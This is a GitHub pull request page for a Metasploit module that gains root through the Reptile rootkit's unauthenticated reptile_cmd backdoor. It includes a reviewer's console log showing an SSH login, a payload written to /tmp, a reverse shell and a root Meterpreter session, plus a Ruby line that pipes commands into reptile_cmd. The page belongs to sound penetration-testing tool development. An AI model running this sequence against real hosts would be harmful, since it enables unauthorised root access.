Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Reptile Rootkit reptile_cmd Privilege Escalation #12701

Merged
merged 1 commit into from Dec 21, 2019

Conversation

@bcoles
Copy link
Contributor

bcoles commented Dec 11, 2019

Add Reptile Rootkit reptile_cmd Privilege Escalation.

    This module uses Reptile rootkit's `reptile_cmd` backdoor executable
    to gain root privileges using the `root` command.

    This module has been tested successfully with Reptile from `master`
    branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
@bcoles

This comment has been minimized.

Copy link
Contributor Author

bcoles commented Dec 11, 2019

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Reptile's features, beyond simply leveraging reptile_cmd to elevate privileges.

The value of this module is largely derived from the check method. The reptile_cmd utility is not password protected, so offers a trivial avenue to root, regardless of who installed it. If the rootkit has been installed to the default directory (/reptile), then this module can also be leveraged by post/multi/recon/local_exploit_suggester to scan a host for Reptile while performing other privesc checks.

@h00die h00die self-assigned this Dec 21, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 21, 2019

Working for me, will check through the PR later, get this landed today

msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' ''
[*] Command shell session 1 opened (1.1.1.1:37937 -> 2.2.2.2:22) at 2019-12-21 07:55:28 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc 
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] The target is vulnerable.
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444 
[*] Writing '/tmp/.BF9f4W2hW1p' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (985320 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:43474) at 2019-12-21 07:56:07 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
vprint_status "Output: #{res}"

if res.include?('You have no power here!')

This comment has been minimized.

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 21, 2019

as assumed, code looks good, its trivial at its most difficult, so going to go ahead and land!

h00die added a commit that referenced this pull request Dec 21, 2019
@h00die h00die merged commit 1ebfe6c into rapid7:master Dec 21, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 21, 2019

Release Notes

This adds a local privilege escalation against a host which has the reptile linux rootkit installed.

msjenkins-r7 added a commit that referenced this pull request Dec 21, 2019
@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Dec 21, 2019

why do i get the strange feeling there are a few more of these you have lined up to add :)

@bcoles bcoles deleted the bcoles:reptile_rootkit_reptile_cmd_priv_esc branch Dec 21, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.